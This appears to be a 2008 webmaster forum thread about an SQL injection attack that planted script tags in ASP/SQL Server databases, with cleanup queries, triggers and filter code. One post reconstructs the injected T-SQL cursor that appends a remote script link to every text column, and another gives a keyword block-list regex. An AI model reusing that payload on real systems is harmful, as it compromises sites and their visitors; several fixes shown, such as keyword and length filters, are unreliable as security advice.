homepage Welcome to WebmasterWorld Guest from
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Become a Pro Member

Home / Forums Index / Code, Content, and Presentation / Databases
Forum Library, Charter, Moderator: open

Databases Forum

This 78 message thread spans 3 pages: < < 78 ( 1 2 [3]     
Sql Injection virus problem.
Virus, Sql Injection.

5+ Year Member

Msg#: 3657200 posted 10:02 am on May 23, 2008 (gmt 0)

Hi Friends, we have a website and we have constanly been attacked by virus. A malicious script enters into sql server database and stops the site.
can any one please suggest us how we can prevent it. I changed some script but that did not help too. I think it is going from our search field. <script>......</script> and inside website name enters into every fields of sql .Please help!

Umar Rahman

[edited by: jatar_k at 12:03 pm (utc) on May 23, 2008]
[edit reason] no urls thanks [/edit]



10+ Year Member

Msg#: 3657200 posted 7:41 pm on May 31, 2008 (gmt 0)

For those who have the same issue as myself, here is what I did, if that can help anyone

First I used Narayana Vyas Kondreddi medhod posted above and then for remaining ntext data type I went through all the table with that kind field and did it one by one using the following statement,

Update <dbTable>
set <tbField> = replace (cast(tbField as nvarchar(4000)), '<spamstr>', '')


5+ Year Member

Msg#: 3657200 posted 6:40 pm on Jun 3, 2008 (gmt 0)

Just got hit. To prevent further attacks I'm implementing some code in an include that checks the full querystring for the presence of sql commands such as "select", "update", etc... characters that should not be present... I'm using regular expressions but simple instr() functions would work also. The key is to do these checks before any sql commands are issues from your scripts, and if triggered to redirect the user to a simple 404 error page.


5+ Year Member

Msg#: 3657200 posted 7:57 am on Jun 7, 2008 (gmt 0)


I have converted all SQLs to StoredProcedure. As of now, there is no SQL commands in my C# code behind ! Still the virus is infected in my database. ( NOTE: I have connection string stored in my WEB.Config ).


5+ Year Member

Msg#: 3657200 posted 8:00 am on Jun 7, 2008 (gmt 0)

I would Suggest all of you to write a TRIGGER on UPDATE EVENT of the table, Check for presence of script tag in NEW VALUES and roll back


5+ Year Member

Msg#: 3657200 posted 6:50 am on Jun 9, 2008 (gmt 0)


-- Description:<Description,,>
-- =============================================
ON [DBO].[BusMaster]
@Bus varchar(150)
-- SET NOCOUNT ON added to prevent extra result sets from
-- interfering with SELECT statements.

if exists (select * from inserted)
select @Bus=BusName from inserted
if @bus like '%<script%' or @bus like '%script>%'
-- Insert statements for trigger here



5+ Year Member

Msg#: 3657200 posted 5:00 pm on Jun 12, 2008 (gmt 0)

I've picked apart how the attach inserts it's data.

On a page that is seen to use querystrings, it adds the following to the end of whatever the valid params are (I've split the line for clarity).


This then runs the following SQL (I've mangled the script tag and URL).

DECLARE Table_Cursor
CURSOR FOR SELECT a.name,b.name
FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u'
AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<scpt src=http://www.thesite.com/b.js></scpt>''')
CLOSE Table_Cursor



5+ Year Member

Msg#: 3657200 posted 3:45 pm on Jun 13, 2008 (gmt 0)

I've cured it very simply by putting the following code at the top of every page. It's part of the generic header include stuff that gets pulled into every page.

(In ASP, don't know what the syntax would be in other web languages).

if len(Request.Servervariables("Query_String")) > 40 then
response.write "Invalid page access"
end if

40 - This is bigger than the querystring that any page on your website will post, adjust as necessary. Given that the injection is 1100 characters, the check could be a lot higher if needed.

Other options would be to redirect to a 404 page or other error, but redirects probably won't to honoured by the webbot so it's easiest to just stop the page dead.



5+ Year Member

Msg#: 3657200 posted 4:08 pm on Aug 7, 2008 (gmt 0)

Hey guys,

My site was hit too. Really Nasty!

I got all that bad data out but I want to make sure this wont happen again.

My question is, in this code below, Can I add this to my global.asa file to ensure all asp pages are protected?

will this work reguardless of how the ASP page was constructed?

' this creates a global regexp object g_bl for testing strings against sql injection
dim g_bl, strURLRequest
set g_bl = New RegExp
g_bl.Pattern = "<IFRAME¦<FRAME¦<object¦</object¦'¦xp_¦;¦--¦/\*¦<script¦</script¦ntext¦nchar¦varchar¦nvarchar¦alter¦begin¦create¦cursor¦declare¦delete¦drop¦exec¦execute¦fetch¦insert¦kill¦open¦sys¦sysobjects¦syscolumns¦table¦update"
g_bl.IgnoreCase = true
g_bl.Multiline = true

If Request.ServerVariables("QUERY_STRING") <> "" Then
strURLRequest= Request.ServerVariables("QUERY_STRING")
If g_bl.test(strURLRequest) Then
End IF
End IF

I feel like im missing something here. I really just need this to protect my site and data?

[edited by: engine at 5:30 pm (utc) on Aug. 7, 2008]
[edit reason] sidescroll [/edit]


WebmasterWorld Senior Member billys us a WebmasterWorld Top Contributor of All Time 10+ Year Member

Msg#: 3657200 posted 1:04 pm on Aug 9, 2008 (gmt 0)

We're patched against this type of attack, but I've got some bot trying to get in for nearly 24 hours now...


5+ Year Member

Msg#: 3657200 posted 2:50 pm on Aug 10, 2008 (gmt 0)

Couple of days ago I also noticed this type of an attack on one of my sites (same/very similar signature). No damage that I can see. I read through this and other linked threads, and it really sounds like "script kiddies" are trying to do this. After decoding hex data, attempt on my site is trying to run javascript file coming from cn domain as well, but it's different then some listed in other threads. Using SEs I searched for source payload using
and can see that number of affected (and indexed) sites is rising by the day. Ofcourse payload file can be named anything but I was curious about this particular "strain" of file. For those of you wanting to play along at home search for w dot js in parenthesis.


WebmasterWorld Senior Member billys us a WebmasterWorld Top Contributor of All Time 10+ Year Member

Msg#: 3657200 posted 12:34 am on Aug 16, 2008 (gmt 0)

The attack on my site wound up going on for around 36 hours. Waste of bandwidth.


5+ Year Member

Msg#: 3657200 posted 3:06 am on Aug 16, 2008 (gmt 0)

There must be a list of urls that "attackers" (script kiddies) are using. I am seeing hits only on une uri...Most of attacks are coming from cn domains, although I am observing some originating from u.s. IPs as well (looks like cable and dsl lines (compromised machines maybe?)).


WebmasterWorld Administrator 10+ Year Member Top Contributors Of The Month

Msg#: 3657200 posted 7:20 pm on Aug 16, 2008 (gmt 0)

Stats of where the Declared SQL attacks are initiating from by Country ISO, generated from hits on one of my sites for the current Month. It was interesting to see what the breakdown was.This was generated as I was trying to figure out what if any ranges were worth blocking altogether in general.

ISO Percent Hits
CN 37.54% 369
US 26.55% 261
TW 05.80% 57
HK 04.07% 40
KR 03.66% 36
CA 03.05% 30
BE 02.03% 20
IT 01.83% 18
AU 01.42% 14
VN 01.22% 12
MY 01.02% 10
MX 00.92% 9
CL 00.81% 8
NZ 00.81% 8
GB 00.71% 7
IL 00.61% 6
NL 00.61% 6
RU 00.61% 6
JP 00.51% 5
BG 00.41% 4
BS 00.41% 4
CO 00.41% 4
DE 00.41% 4
FR 00.41% 4
SG 00.41% 4
TH 00.41% 4
CS 00.31% 3
AR 00.20% 2
BR 00.20% 2
CH 00.20% 2
FI 00.20% 2
HU 00.20% 2
ID 00.20% 2
MU 00.20% 2
NO 00.20% 2
PE 00.20% 2
PH 00.20% 2
PL 00.20% 2
PT 00.20% 2
RO 00.20% 2
TR 00.20% 2
VE 00.20% 2


5+ Year Member

Msg#: 3657200 posted 10:49 am on Aug 22, 2008 (gmt 0)

I've been getting hit with this over the past few days.

A few of the hits caused a child process of httpd to segfault!

I was not compromised. Mod Security failed the attempts.
To be sure, I searched the database for "http" and "iframe" entires - 0.
The server was also checked by a server security specialist and they couldn't figure exactly why it segfaulted either. (Cannot replicate whatever the probes are doing, specifically)

I wouldn't have known this even happened if I hadn't been digging through /var/log/messages (no downtime or interruptions what-so-ever associated with the segfaults)

(Server: Linux/Apache, MySQL and PHP are both up to date.. with grsec kernel)

Anyone else experiencing this? Does anyone know why it's causing the killing of a child process?


5+ Year Member

Msg#: 3657200 posted 3:12 pm on Aug 26, 2008 (gmt 0)

They are now attacking my pages that are static but end in .asp

You would think that after several weeks they would move on. Has anyone identified anything that would make them finally realize that the site was protected? A response code, 404 etc...? Maybe redirect them to the IP that's being used?


5+ Year Member

Msg#: 3657200 posted 3:35 pm on Aug 26, 2008 (gmt 0)

lol they're doing the same thing with my site, hitting well over 100 times a day, not stopping for anyhting, and yes, hitting static pages that end in .asp

Can we send them to a page delay that lasts a few minutes to annoy them a little?


5+ Year Member

Msg#: 3657200 posted 11:03 am on Oct 15, 2008 (gmt 0)

Hi Friends,

I m also having the similar problem with my website in ASP. My whole Database is infected with the content ''><script src=".../new.htm"> .... </script> all my data is corrupted . Its just an Sql Injection but i cant found the solution how it happens? Pls help me to solve this pls


5+ Year Member

Msg#: 3657200 posted 4:45 am on Oct 16, 2008 (gmt 0)

This seems to be an old topic, and related to ASP (which I'm not familiar with), but how about encoding HTML char's before insertion into the database. So if someone enters

<script blah ""></script>

Before inserting the input into database, clean up and convert it to

&lt;script blah &quot;&quot;&gt&lt/script&gt;

Unless I'm missing something, after this the script won't get executed...
PHP has built in functions for this (htmlspceialchars() or similar).. donno about ASP

This 78 message thread spans 3 pages: < < 78 ( 1 2 [3]
Global Options:
 top home search open messages active posts  

Home / Forums Index / Code, Content, and Presentation / Databases
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved